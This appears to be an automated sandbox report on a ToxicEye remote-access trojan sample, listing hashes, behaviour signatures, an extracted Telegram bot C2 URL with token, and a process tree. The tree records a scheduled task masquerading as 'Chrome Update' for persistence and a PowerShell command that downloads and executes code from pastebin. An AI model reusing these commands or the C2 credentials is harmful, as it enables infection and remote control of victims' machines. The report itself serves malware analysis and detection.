Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241023-en
  • resource tags

    arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05/01/2025, 12:30

General

  • Target

    TelegramRAT.exe

  • Size

    119KB

  • MD5

    47436ad8508cbdbede6535db163766bc

  • SHA1

    c6c6f8eb7dac9f294da1547e30c320a7d316bf52

  • SHA256

    43eca90ecc5958fd358a9240f31b1811ad2d01c6db10397cfd88e445ff8be5e0

  • SHA512

    255a5618cf57a4930e08e02628bef7533289e2968fcf0d1db617447f7c04245978fc9d83c29247ffd9478a5428a3491a28458bcb2eb05efb0a4566ad43bf5a9c

  • SSDEEP

    3072:gAWfRzlXCwwFwOwWAmm+G/bxqH8QW8zCrAZu/tM1:gAD1SWHe/bg/p

Malware Config

Extracted

Family

toxiceye

C2

https://api.telegram.org/bot7919388970:AAGC7fUBzVyMANzjN6bhRPjR0LNTw4C5Zlo/sendMessage?chat_id=8130842755

Signatures

  • ToxicEye

    ToxicEye is a trojan written in C#.

  • Toxiceye family
  • Executes dropped EXE 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe
    "C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1788
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2100
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4904
      • C:\Windows\system32\tasklist.exe
        Tasklist /fi "PID eq 1788"
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:984
      • C:\Windows\system32\find.exe
        find ":"
        3⤵
          PID:2736
        • C:\Windows\system32\timeout.exe
          Timeout /T 1 /Nobreak
          3⤵
          • Delays execution with timeout.exe
          PID:1496
        • C:\Users\ToxicEye\rat.exe
          "rat.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1768
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2400
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c <ipconfig>
            4⤵
              PID:4840
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c <powershell "irm "pastebin.com/raw/1nfKw4aY" | iex">
              4⤵
                PID:3556

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp.bat

          Filesize

          188B

          MD5

          18f5841a0c93cc750a9d06ebeab36a36

          SHA1

          d6ff80e60c0d9fcc1e46d56c157b1dd18c23138a

          SHA256

          ad1654182869b6ff16718dd44d1313ea606af6240014faf82d1f61d03c549f15

          SHA512

          f099364c9cffecde66a0874baf10949dc8a54963204d113acd2e71b98fa5d0b9c48c627e03a22fe22af4675cab7be0e8e27dbd1a6e18e73b5806c52dff2280da

        • C:\Users\ToxicEye\rat.exe

          Filesize

          119KB

          MD5

          47436ad8508cbdbede6535db163766bc

          SHA1

          c6c6f8eb7dac9f294da1547e30c320a7d316bf52

          SHA256

          43eca90ecc5958fd358a9240f31b1811ad2d01c6db10397cfd88e445ff8be5e0

          SHA512

          255a5618cf57a4930e08e02628bef7533289e2968fcf0d1db617447f7c04245978fc9d83c29247ffd9478a5428a3491a28458bcb2eb05efb0a4566ad43bf5a9c

        • memory/1768-11-0x000001D47F740000-0x000001D47F7EA000-memory.dmp

          Filesize

          680KB

        • memory/1768-12-0x000001D47F850000-0x000001D47F8C6000-memory.dmp

          Filesize

          472KB

        • memory/1788-0-0x00007FFF67D53000-0x00007FFF67D55000-memory.dmp

          Filesize

          8KB

        • memory/1788-1-0x000001CFA2650000-0x000001CFA2674000-memory.dmp

          Filesize

          144KB

        • memory/1788-2-0x00007FFF67D50000-0x00007FFF68812000-memory.dmp

          Filesize

          10.8MB

        • memory/1788-6-0x00007FFF67D50000-0x00007FFF68812000-memory.dmp

          Filesize

          10.8MB